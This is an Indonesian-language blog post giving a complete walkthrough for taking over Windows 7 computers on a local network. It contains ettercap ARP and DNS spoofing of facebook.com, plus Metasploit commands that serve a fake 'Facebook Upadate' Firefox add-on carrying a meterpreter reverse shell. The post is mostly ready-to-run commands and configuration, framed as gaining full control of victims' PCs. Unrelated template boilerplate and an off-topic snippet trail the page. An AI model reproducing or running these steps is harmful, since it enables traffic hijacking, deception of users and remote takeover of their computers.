Breaking

Friday, 15 February 2013

Home / BackTrack / Exploit Windows 7 dengan add ons

Exploit Windows 7 dengan add ons

by on in
Untuk memasuki system windows 7 ada banyak cara salah satunya memanipulasi add on dari mozilla ketika menjalankan exploit ini browser korban akan muncul dialog penginstalan add on mozilla ketika korban klik install dan menjalankan payload dan anda mendapatkan akses penuh pada komputer korban

Telah saya coba pad lab saya

berikut POC nya

Atur  dns spoof nya
buka console lalu ketikkan perintah
root@dvildance:~ 
#locate 
etter.dns 
untuk mengetahui letak pengaturan ettercap

kemudian atur dns spoofnya di pengaturan etter.dns
root@dvildance:~ 
#nano 
/usr/local/share/ettercap/etter.dns

http://1.bp.blogspot.com/-yyusZn71hFU/UKXElY1ZXfI/AAAAAAAAB7M/H3trzcGSHJo/s1600/1.png


rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.7
rubah di bagian ini
Code:
# microsoft sucks ;)
# redirect it to www.linux.org
#

facebook.com      A   192.168.1.7
*.facebook.com    A   192.168.1.7
www.facebook.com  PTR 192.168.1.7      # Wildcards in PTR are not allowed

Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita

http://2.bp.blogspot.com/-LSnG03VByuY/UKXFFkCDwkI/AAAAAAAAB7U/XOcCeGPDong/s1600/1.png


setelah itu save dengan menkan cxtr+x lalu y dan enter

Ketika sudah di set buka msfconsole pada terminal backtrack
root@dvildance:~#msfconsole

Tunggu hingga metasploit muncul dan ketikkan perintah exploitnya
msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit(firefox_xpi_bootstrapped_addon) > set payload windows/meterpreter/reverse_tcp
msf exploit(firefox_xpi_bootstrapped_addon) > set addonname Facebook Upadate
msf exploit(firefox_xpi_bootstrapped_addon) > set srvhost 192.168.1.7
msf exploit(firefox_xpi_bootstrapped_addon) > set srvport 80
msf exploit(firefox_xpi_bootstrapped_addon) > set uripath /
msf exploit(firefox_xpi_bootstrapped_addon) > set lhost 192.168.1.7
msf exploit(firefox_xpi_bootstrapped_addon) > set lport 443
msf exploit(firefox_xpi_bootstrapped_addon) > exploit

http://4.bp.blogspot.com/-yrCU9jwCWKk/UKXGWGOroQI/AAAAAAAAB7c/xdghsfGgzCA/s1600/1.png


Sekarang tinggal memulai spoofing dengan ettercap
buka terminal dan jalankan ettercap dengan perintah
root@dvildance:~ 
#ettercap 
-T -q -M arp -i wlan0 -P dns_spoof // -P autoadd
[Image: 1.png]

tunggu hingga korban menginstall add on
[Image: 1.PNG]

http://4.bp.blogspot.com/-pVVpxpuC7H4/UKXXhPDdqXI/AAAAAAAAB9A/ZAm4gQDhViE/s1600/2.PNG


Dan berhasil dapatkan meterpreter tekan ctrl+c untuk mengakhiri dan masuk ke meterpreter dengan perintah sessions -i 1

[Image: 1.png]

info pc
http://2.bp.blogspot.com/-o35LA_pffO8/UKXYN2kkL0I/AAAAAAAAB9Q/ic4zM-GZNXg/s1600/1.png


Sekarang pc korban berada di tangan anda
sumber : indonesianbacktrack.or.id
Author Image

About Maftuh Blog
Soratemplates is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design. The main mission of templatesyard is to provide the best quality blogger templates.

Related Posts:
By at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Iphone X

Depending on the sum of water, some individuals have recommended waiting anywhere from 2 to seven days. If you try this system, change the ...